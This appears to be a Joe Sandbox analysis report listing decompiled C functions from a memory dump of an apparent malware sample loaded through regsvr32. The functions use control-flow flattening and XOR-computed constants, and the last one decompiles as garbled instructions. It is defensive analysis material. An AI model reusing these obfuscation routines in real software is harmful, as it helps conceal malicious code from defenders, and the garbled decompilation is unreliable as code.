                                                                                                                • Instruction Fuzzy Hash: 83A10EB15093819FC368DF2AC58944BFBE0FBD4B58F004A1DF9A596220D3B4DA49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001BDF2B(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				char _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				signed int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				void* _t106;
                                                                                                                				intOrPtr _t114;
                                                                                                                				void* _t117;
                                                                                                                				void* _t121;
                                                                                                                				intOrPtr* _t132;
                                                                                                                				void* _t133;
                                                                                                                				signed int _t134;
                                                                                                                				signed int* _t137;
                                                                                                                
                                                                                                                				_t119 = _a8;
                                                                                                                				_push(_a16);
                                                                                                                				_t132 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t106);
                                                                                                                				_v64 = 0xda99f;
                                                                                                                				_t137 =  &(( &_v84)[6]);
                                                                                                                				_v64 = _v64 >> 0xa;
                                                                                                                				_t133 = 0;
                                                                                                                				_t121 = 0xc08d029;
                                                                                                                				_t134 = 0x24;
                                                                                                                				_v64 = _v64 / _t134;
                                                                                                                				_v64 = _v64 ^ 0x00000018;
                                                                                                                				_v60 = 0x7da1a;
                                                                                                                				_v60 = _v60 | 0xc1a476a1;
                                                                                                                				_v60 = _v60 + 0xffffc049;
                                                                                                                				_v60 = _v60 ^ 0xc1a7bf04;
                                                                                                                				_v84 = 0x8ea480;
                                                                                                                				_v84 = _v84 + 0xffff45ae;
                                                                                                                				_v84 = _v84 * 0x30;
                                                                                                                				_v84 = _v84 + 0x7c1f;
                                                                                                                				_v84 = _v84 ^ 0x1a9f4911;
                                                                                                                				_v68 = 0xf07d5b;
                                                                                                                				_v68 = _v68 << 2;
                                                                                                                				_v68 = _v68 | 0x6f0b3482;
                                                                                                                				_v68 = _v68 ^ 0x6fc29cb2;
                                                                                                                				_v72 = 0x80888;
                                                                                                                				_v72 = _v72 + 0xffff5dbf;
                                                                                                                				_v72 = _v72 | 0x7412998f;
                                                                                                                				_v72 = _v72 ^ 0x74107827;
                                                                                                                				_v56 = 0xe8f879;
                                                                                                                				_v56 = _v56 | 0xb0989566;
                                                                                                                				_v56 = _v56 ^ 0xb0f2f86f;
                                                                                                                				_v40 = 0x741eab;
                                                                                                                				_v40 = _v40 * 0x30;
                                                                                                                				_v40 = _v40 ^ 0x15c2356b;
                                                                                                                				_v44 = 0xb979e7;
                                                                                                                				_v44 = _v44 ^ 0x292234c1;
                                                                                                                				_v44 = _v44 ^ 0x299ef497;
                                                                                                                				_v76 = 0x914b48;
                                                                                                                				_v76 = _v76 << 5;
                                                                                                                				_v76 = _v76 + 0x8cd2;
                                                                                                                				_v76 = _v76 ^ 0x1228d261;
                                                                                                                				_v80 = 0xf1d869;
                                                                                                                				_v80 = _v80 >> 2;
                                                                                                                				_v80 = _v80 << 0xb;
                                                                                                                				_v80 = _v80 ^ 0xe651db24;
                                                                                                                				_v80 = _v80 ^ 0x05e5db94;
                                                                                                                				_v48 = 0xc3728a;
                                                                                                                				_v48 = _v48 + 0xb4f4;
                                                                                                                				_v48 = _v48 ^ 0x00cfff4f;
                                                                                                                				_v52 = 0x7de609;
                                                                                                                				_v52 = _v52 + 0x31a2;
                                                                                                                				_v52 = _v52 ^ 0x0071663e;
                                                                                                                				do {
                                                                                                                					while(_t121 != 0x40ccc02) {
                                                                                                                						if(_t121 == 0x4e4cbe0) {
                                                                                                                							_push(_t121);
                                                                                                                							_t117 = E001BAF0B( &_v36, _v84, _v68, _v72,  *_t132,  *((intOrPtr*)(_t132 + 4)), _v56);
                                                                                                                							_t137 =  &(_t137[6]);
                                                                                                                							if(_t117 != 0) {
                                                                                                                								_t121 = 0x40ccc02;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t121 != 0xc08d029) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								_t121 = 0x4e4cbe0;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t114 =  *0x1c4208; // 0x0
                                                                                                                					E001AA762( *_t119, _v40, _v64, _v44,  *((intOrPtr*)(_t114 + 0x14)),  &_v36, _v76, _t121, _v80, _t121, _v48,  *((intOrPtr*)(_t119 + 4)), _v52);
                                                                                                                					_t137 =  &(_t137[0xb]);
                                                                                                                					_t121 = 0xabdbc9a;
                                                                                                                					_t133 =  ==  ? 1 : _t133;
                                                                                                                					L8:
                                                                                                                				} while (_t121 != 0xabdbc9a);
                                                                                                                				L9:
                                                                                                                				return _t133;
                                                                                                                			}

























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: >fq
                                                                                                                • API String ID: 0-3306265603
                                                                                                                • Opcode ID: a05eb2dc0a9616a35f7017b4a161f0929380aa1587c5c6b1209ab06a9c79186b
                                                                                                                • Instruction ID: 5fbcfefbe42939c10aaeed87ca6bd4e8fe0365d219bca63fa7292153f34466be
                                                                                                                • Opcode Fuzzy Hash: a05eb2dc0a9616a35f7017b4a161f0929380aa1587c5c6b1209ab06a9c79186b
                                                                                                                • Instruction Fuzzy Hash: 56512171508301AFC759DF25C98A85BBBF1FBD8718F805A1CF58692220D3B1CA49CF82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001C1A0A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				char _v80;
                                                                                                                				char _v600;
                                                                                                                				void* _t105;
                                                                                                                				void* _t118;
                                                                                                                				void* _t125;
                                                                                                                				signed int _t140;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t142;
                                                                                                                				void* _t144;
                                                                                                                				void* _t145;
                                                                                                                
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t105);
                                                                                                                				_v36 = 0x5dad20;
                                                                                                                				_t145 = _t144 + 0x14;
                                                                                                                				_t125 = 0x219ea1;
                                                                                                                				_t140 = 0x11;
                                                                                                                				_v36 = _v36 * 0x5a;
                                                                                                                				_v36 = _v36 ^ 0x20eedd50;
                                                                                                                				_v40 = 0xa34fb8;
                                                                                                                				_v40 = _v40 ^ 0x8ad5a020;
                                                                                                                				_v40 = _v40 ^ 0x8a713a86;
                                                                                                                				_v24 = 0xab86fb;
                                                                                                                				_v24 = _v24 | 0x85d38fb4;
                                                                                                                				_v24 = _v24 + 0x41bb;
                                                                                                                				_v24 = _v24 ^ 0x85fb527d;
                                                                                                                				_v44 = 0x5fcc97;
                                                                                                                				_v44 = _v44 ^ 0x2eb67f47;
                                                                                                                				_v44 = _v44 ^ 0x2ee1d799;
                                                                                                                				_v20 = 0x6a4326;
                                                                                                                				_v20 = _v20 * 0x2d;
                                                                                                                				_v20 = _v20 | 0xd1799313;
                                                                                                                				_v20 = _v20 ^ 0xd3fc0f70;
                                                                                                                				_v16 = 0x14e0aa;
                                                                                                                				_v16 = _v16 + 0xffffc7ea;
                                                                                                                				_v16 = _v16 + 0xffff6e14;
                                                                                                                				_v16 = _v16 / _t140;
                                                                                                                				_v16 = _v16 ^ 0x0005f511;
                                                                                                                				_v48 = 0xf3b4c6;
                                                                                                                				_t141 = 0x49;
                                                                                                                				_v48 = _v48 / _t141;
                                                                                                                				_v48 = _v48 ^ 0x000d5b98;
                                                                                                                				_v32 = 0x6c9aa5;
                                                                                                                				_v32 = _v32 | 0x46704315;
                                                                                                                				_v32 = _v32 ^ 0x467eff73;
                                                                                                                				_v28 = 0x100ef2;
                                                                                                                				_v28 = _v28 + 0x93d1;
                                                                                                                				_v28 = _v28 + 0xffffcead;
                                                                                                                				_v28 = _v28 ^ 0x00119808;
                                                                                                                				_v8 = 0xcacd69;
                                                                                                                				_t142 = 0x22;
                                                                                                                				_v8 = _v8 * 0x24;
                                                                                                                				_v8 = _v8 ^ 0x98d02f57;
                                                                                                                				_v8 = _v8 + 0xb742;
                                                                                                                				_v8 = _v8 ^ 0x8458190c;
                                                                                                                				_v12 = 0x686ff5;
                                                                                                                				_v12 = _v12 * 0x7f;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 / _t142;
                                                                                                                				_v12 = _v12 ^ 0x000a036a;
                                                                                                                				do {
                                                                                                                					while(_t125 != 0x219ea1) {
                                                                                                                						if(_t125 == 0x5c9bf8a) {
                                                                                                                							_t118 = E001A94D4(_v20, _v16, _v48, _t125, _v32,  &_v600);
                                                                                                                							_t145 = _t145 + 0x10;
                                                                                                                							_t125 = 0x7b597ae;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(_t125 != 0x7b597ae) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						return E001A33B6(_v28, _a12, _t125, _v8, _v12,  &_v600,  &_v80);
                                                                                                                					}
                                                                                                                					_t118 = E001B25CD(_v40, _v24, _v36, _v44,  &_v80);
                                                                                                                					_t145 = _t145 + 0xc;
                                                                                                                					_t125 = 0x5c9bf8a;
                                                                                                                					L8:
                                                                                                                				} while (_t125 != 0xa97d2c4);
                                                                                                                				return _t118;
                                                                                                                			}

























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &Cj
                                                                                                                • API String ID: 0-3048372160
                                                                                                                • Opcode ID: d7484a658b88edb967a0cc4a66cb019a3fcb705f29091c344cf0e0ec6a1b9aa4
                                                                                                                • Instruction ID: 185cfb083c8ac7c16dcdc1f9d81e10f1ec064dc7778e3d3eb6a0124178de8744
                                                                                                                • Opcode Fuzzy Hash: d7484a658b88edb967a0cc4a66cb019a3fcb705f29091c344cf0e0ec6a1b9aa4
                                                                                                                • Instruction Fuzzy Hash: F25125B2D0020DEBCF08DFE5C9869EEBBB6FF58314F108199E511B6260E7745A458FA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E001A188C(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				char _v60;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v72;
                                                                                                                				intOrPtr _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				void* _t75;
                                                                                                                				void* _t80;
                                                                                                                				void* _t82;
                                                                                                                				intOrPtr _t95;
                                                                                                                				signed int* _t98;
                                                                                                                
                                                                                                                				_t70 = __eax;
                                                                                                                				_t94 = _a8;
                                                                                                                				_t80 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t70);
                                                                                                                				_v76 = 0xb27d2c;
                                                                                                                				_t95 = 0;
                                                                                                                				_v72 = 0xea864d;
                                                                                                                				_t98 =  &(( &_v108)[4]);
                                                                                                                				_v68 = 0x1f2dab;
                                                                                                                				_t82 = 0x3ac7409;
                                                                                                                				_v64 = 0;
                                                                                                                				_v92 = 0x191778;
                                                                                                                				_v92 = _v92 | 0xa20a80f7;
                                                                                                                				_v92 = _v92 ^ 0xa216246b;
                                                                                                                				_v100 = 0xa964d4;
                                                                                                                				_v100 = _v100 + 0x8b05;
                                                                                                                				_v100 = _v100 + 0xffff7529;
                                                                                                                				_v100 = _v100 ^ 0x00ad9bce;
                                                                                                                				_v104 = 0x46ba3c;
                                                                                                                				_v104 = _v104 | 0xb6256e3b;
                                                                                                                				_v104 = _v104 * 0x21;
                                                                                                                				_v104 = _v104 ^ 0x8361d7ca;
                                                                                                                				_v88 = 0x81c27d;
                                                                                                                				_v88 = _v88 * 0x68;
                                                                                                                				_v88 = _v88 ^ 0x34bbe2dd;
                                                                                                                				_v96 = 0xcb4588;
                                                                                                                				_v96 = _v96 + 0x9f78;
                                                                                                                				_v96 = _v96 >> 0xd;
                                                                                                                				_v96 = _v96 ^ 0x0003c6e6;
                                                                                                                				_v108 = 0x8ce280;
                                                                                                                				_v108 = _v108 ^ 0x62397b6a;
                                                                                                                				_v108 = _v108 ^ 0x5c51708f;
                                                                                                                				_v108 = _v108 ^ 0x0d69e953;
                                                                                                                				_v108 = _v108 ^ 0x338347c6;
                                                                                                                				_v80 = 0x92c06b;
                                                                                                                				_v80 = _v80 ^ 0x00901884;
                                                                                                                				_v84 = 0xe644d6;
                                                                                                                				_v84 = _v84 << 0xd;
                                                                                                                				_v84 = _v84 ^ 0xc899afdb;
                                                                                                                				do {
                                                                                                                					while(_t82 != 0x274709f) {
                                                                                                                						if(_t82 == 0x3ac7409) {
                                                                                                                							_t82 = 0x3eb1887;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t82 == 0x3eb1887) {
                                                                                                                								E001A6DD9( &_v60, _v92, _v100, _t80, _v104);
                                                                                                                								_t98 =  &(_t98[3]);
                                                                                                                								_t82 = 0x274709f;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								_t103 = _t82 - 0xa1a2c51;
                                                                                                                								if(_t82 != 0xa1a2c51) {
                                                                                                                									goto L13;
                                                                                                                								} else {
                                                                                                                									E001AA903(_v80, _t94 + 0x20, _t103, _v84,  &_v60);
                                                                                                                									_t95 =  !=  ? 1 : _t95;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L7:
                                                                                                                						return _t95;
                                                                                                                					}
                                                                                                                					_t75 = E001B6D3A( &_v60, _t94 + 0x1c, _v88, _v96, _v108);
                                                                                                                					_t98 =  &(_t98[3]);
                                                                                                                					__eflags = _t75;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						_t82 = 0x38dd9d8;
                                                                                                                						goto L13;
                                                                                                                					} else {
                                                                                                                						_t82 = 0xa1a2c51;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L7;
                                                                                                                					L13:
                                                                                                                					__eflags = _t82 - 0x38dd9d8;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L7;
                                                                                                                			}






















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Si
                                                                                                                • API String ID: 0-3544519720
                                                                                                                • Opcode ID: 278147f5c3bf1fb876cbd81278b4c6a324d2545211b611b3f3f851bcff42cebc
                                                                                                                • Instruction ID: d62d4a507c7e5a8ee33c083af8230dec15027acd06d98393f2031ef07d9f1d59
                                                                                                                • Opcode Fuzzy Hash: 278147f5c3bf1fb876cbd81278b4c6a324d2545211b611b3f3f851bcff42cebc
                                                                                                                • Instruction Fuzzy Hash: C84156B51083469FCB18CF60859646FBBE5FBD5748F004A1EF58AA6221D7B1CA09CF87
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E001C23B9(void* __ecx) {
                                                                                                                				void* _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				unsigned int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				void* _t84;
                                                                                                                				void* _t87;
                                                                                                                				void* _t89;
                                                                                                                				signed int _t103;
                                                                                                                				signed int _t104;
                                                                                                                				signed int _t105;
                                                                                                                				void* _t107;
                                                                                                                				signed int* _t109;
                                                                                                                
                                                                                                                				_t109 =  &_v44;
                                                                                                                				_v16 = 0xd6b566;
                                                                                                                				asm("stosd");
                                                                                                                				_t87 = __ecx;
                                                                                                                				_t107 = 0;
                                                                                                                				_t89 = 0xd0c0070;
                                                                                                                				asm("stosd");
                                                                                                                				asm("stosd");
                                                                                                                				_v20 = 0x51f356;
                                                                                                                				_v20 = _v20 >> 0x10;
                                                                                                                				_v20 = _v20 ^ 0x000bea3b;
                                                                                                                				_v28 = 0xb4b0c6;
                                                                                                                				_t103 = 0x2a;
                                                                                                                				_v28 = _v28 / _t103;
                                                                                                                				_v28 = _v28 >> 1;
                                                                                                                				_v28 = _v28 ^ 0x00092717;
                                                                                                                				_v32 = 0xc38ea6;
                                                                                                                				_v32 = _v32 ^ 0x4c78f67b;
                                                                                                                				_v32 = _v32 << 0xb;
                                                                                                                				_v32 = _v32 ^ 0xdbc3fa1d;
                                                                                                                				_v36 = 0xf191c1;
                                                                                                                				_v36 = _v36 >> 3;
                                                                                                                				_v36 = _v36 ^ 0x7f757a64;
                                                                                                                				_v36 = _v36 ^ 0x7f6a41e3;
                                                                                                                				_v40 = 0xf711a2;
                                                                                                                				_v40 = _v40 + 0xffff7538;
                                                                                                                				_v40 = _v40 + 0xffff1292;
                                                                                                                				_v40 = _v40 ^ 0x00f55378;
                                                                                                                				_v24 = 0xe9ba00;
                                                                                                                				_v24 = _v24 | 0x98b47929;
                                                                                                                				_t104 = 0x44;
                                                                                                                				_v24 = _v24 / _t104;
                                                                                                                				_v24 = _v24 ^ 0x023fe814;
                                                                                                                				_v44 = 0x22d2ba;
                                                                                                                				_t105 = 0x39;
                                                                                                                				_v44 = _v44 / _t105;
                                                                                                                				_v44 = _v44 ^ 0xdb6b95f9;
                                                                                                                				_v44 = _v44 >> 9;
                                                                                                                				_v44 = _v44 ^ 0x006e8ae5;
                                                                                                                				do {
                                                                                                                					while(_t89 != 0xc202caf) {
                                                                                                                						if(_t89 == 0xd0c0070) {
                                                                                                                							_t89 = 0xd2d5b5d;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t89 == 0xd2d5b5d) {
                                                                                                                								_push(_t89);
                                                                                                                								_push(_t89);
                                                                                                                								_t84 = E001BED77();
                                                                                                                								_t109 =  &(_t109[2]);
                                                                                                                								_t89 = 0xdacd8f7;
                                                                                                                								_t107 = _t107 + _t84;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t89 == 0xdacd8f7) {
                                                                                                                									_t107 = _t107 + E001ABF8B(_v36, _t87 + 0x14, _v40);
                                                                                                                									_t89 = 0xc202caf;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t107 = _t107 + E001ABF8B(_v24, _t87 + 0xc, _v44);
                                                                                                                					_t89 = 0x2d1b9a;
                                                                                                                					L9:
                                                                                                                				} while (_t89 != 0x2d1b9a);
                                                                                                                				return _t107;
                                                                                                                			}





















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ][-
                                                                                                                • API String ID: 0-642903904
                                                                                                                • Opcode ID: 12d6bf39a696b811b87ec668ef6ee674d6c4fe829f873bdf6dd9df4a1cb0bc10
                                                                                                                • Instruction ID: 9ef8d10d87aee9406daf5690864373221c069cc5b3a20fd274c3fd767f01e66a
                                                                                                                • Opcode Fuzzy Hash: 12d6bf39a696b811b87ec668ef6ee674d6c4fe829f873bdf6dd9df4a1cb0bc10
                                                                                                                • Instruction Fuzzy Hash: E7418A716083019FD708CF29E44582FBBE1FBD8758F144A1EE59AA7264D3B1CA49CB93
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E001BF9AF(void* __ecx) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				void* _t64;
                                                                                                                				void* _t73;
                                                                                                                				void* _t74;
                                                                                                                				signed int* _t76;
                                                                                                                
                                                                                                                				_t64 = __ecx;
                                                                                                                				_t76 =  &_v20;
                                                                                                                				_v16 = 0x4af276;
                                                                                                                				_v16 = _v16 ^ 0xecc34d8f;
                                                                                                                				_v16 = _v16 << 6;
                                                                                                                				_v16 = _v16 + 0x4f8e;
                                                                                                                				_v16 = _v16 ^ 0x22759259;
                                                                                                                				_v20 = 0xccfddb;
                                                                                                                				_v20 = _v20 + 0xfffffe7c;
                                                                                                                				_v20 = _v20 << 6;
                                                                                                                				_t61 = 0x7d;
                                                                                                                				_v20 = _v20 / _t61;
                                                                                                                				_t73 = 0;
                                                                                                                				_v20 = _v20 ^ 0x00634dbd;
                                                                                                                				_t74 = 0x62a02c8;
                                                                                                                				_v8 = 0xdb6cf6;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_t62 = 0x17;
                                                                                                                				_v8 = _v8 / _t62;
                                                                                                                				_v8 = _v8 ^ 0x04cdce71;
                                                                                                                				_v4 = 0xe45409;
                                                                                                                				_v4 = _v4 | 0xa3566518;
                                                                                                                				_v4 = _v4 ^ 0x84b40a6a;
                                                                                                                				_v4 = _v4 ^ 0x27428edb;
                                                                                                                				_v12 = 0xd682bf;
                                                                                                                				_v12 = _v12 * 0x66;
                                                                                                                				_v12 = _v12 + 0xffff849f;
                                                                                                                				_v12 = _v12 >> 0xf;
                                                                                                                				_v12 = _v12 ^ 0x000a91c3;
                                                                                                                				do {
                                                                                                                					while(_t74 != 0x62a02c8) {
                                                                                                                						if(_t74 == 0x6fac46b) {
                                                                                                                							_push(_t64);
                                                                                                                							_push(_t64);
                                                                                                                							_t58 = E001BED77();
                                                                                                                							_t76 =  &(_t76[2]);
                                                                                                                							_t74 = 0xb6c07ca;
                                                                                                                							_t73 = _t73 + _t58;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t74 != 0xb6c07ca) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								_t73 = _t73 + E001ABF8B(_v4, _t64 + 4, _v12);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L5:
                                                                                                                						return _t73;
                                                                                                                					}
                                                                                                                					_t74 = 0x6fac46b;
                                                                                                                					L8:
                                                                                                                				} while (_t74 != 0x216dadc);
                                                                                                                				goto L5;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: T
                                                                                                                • API String ID: 0-4218349378
                                                                                                                • Opcode ID: 5cbdb13f17435192ceeabd7ce887680e0570211b9ea0a79361a8cac6a7ca349d
                                                                                                                • Instruction ID: 88ef52b3e91304a61335b837dd6dfca104e14084aa0b87e25f24f977a89e8057
                                                                                                                • Opcode Fuzzy Hash: 5cbdb13f17435192ceeabd7ce887680e0570211b9ea0a79361a8cac6a7ca349d
                                                                                                                • Instruction Fuzzy Hash: D731CEB25083029FC318DF29C88545BFBE1FBD4754F118A2DE8E997211D3759A0ACF92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E001A186B(signed int __eax, signed int __ecx, void* __edi, signed int _a24, signed int _a28, signed int _a32, signed int _a36, signed int _a40, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, char _a72) {
                                                                                                                				void* _t77;
                                                                                                                				void* _t82;
                                                                                                                				void* _t85;
                                                                                                                				intOrPtr _t98;
                                                                                                                				void* _t102;
                                                                                                                				void* _t103;
                                                                                                                
                                                                                                                				L0:
                                                                                                                				while(1) {
                                                                                                                					L0:
                                                                                                                					_t96 = __edi;
                                                                                                                					_t84 = __ecx;
                                                                                                                					_t71 = __eax;
                                                                                                                					asm("xlatb");
                                                                                                                					asm("cmpsb");
                                                                                                                					_t71 = __ecx;
                                                                                                                					_t84 = __eax | 0x471ddfbd;
                                                                                                                					asm("sbb dl, [esi-0x60]");
                                                                                                                					asm("invalid");
                                                                                                                					L2:
                                                                                                                					_t96 = __edi - 1;
                                                                                                                					asm("fbstp tword [esi-0x617bd79c]");
                                                                                                                					goto 0x81ba;
                                                                                                                					 *((char*)(_t96 + 0x30d31d4c)) = __ecx;
                                                                                                                					asm("aas");
                                                                                                                					_push( *((intOrPtr*)(_t84 - 0x73)));
                                                                                                                					asm("salc");
                                                                                                                					asm("fcomp3 st2");
                                                                                                                					if (_t96 < 0) goto L1;
                                                                                                                				}
                                                                                                                				asm("out 0x3d, al");
                                                                                                                				 *__eax =  *__eax + __eax;
                                                                                                                				_push(_t82);
                                                                                                                				_push(__ecx);
                                                                                                                				E001AC98A(_t71);
                                                                                                                				_a56 = 0xb27d2c;
                                                                                                                				_t98 = 0;
                                                                                                                				_a60 = 0xea864d;
                                                                                                                				_t103 = _t102 + 0x10;
                                                                                                                				_a64 = 0x1f2dab;
                                                                                                                				_t85 = 0x3ac7409;
                                                                                                                				_a68 = 0;
                                                                                                                				_a40 = 0x191778;
                                                                                                                				_a40 = _a40 | 0xa20a80f7;
                                                                                                                				_a40 = _a40 ^ 0xa216246b;
                                                                                                                				_a32 = 0xa964d4;
                                                                                                                				_a32 = _a32 + 0x8b05;
                                                                                                                				_a32 = _a32 + 0xffff7529;
                                                                                                                				_a32 = _a32 ^ 0x00ad9bce;
                                                                                                                				_a28 = 0x46ba3c;
                                                                                                                				_a28 = _a28 | 0xb6256e3b;
                                                                                                                				_a28 = _a28 * 0x21;
                                                                                                                				_a28 = _a28 ^ 0x8361d7ca;
                                                                                                                				_a44 = 0x81c27d;
                                                                                                                				_a44 = _a44 * 0x68;
                                                                                                                				_a44 = _a44 ^ 0x34bbe2dd;
                                                                                                                				_a36 = 0xcb4588;
                                                                                                                				_a36 = _a36 + 0x9f78;
                                                                                                                				_a36 = _a36 >> 0xd;
                                                                                                                				_a36 = _a36 ^ 0x0003c6e6;
                                                                                                                				_a24 = 0x8ce280;
                                                                                                                				_a24 = _a24 ^ 0x62397b6a;
                                                                                                                				_a24 = _a24 ^ 0x5c51708f;
                                                                                                                				_a24 = _a24 ^ 0x0d69e953;
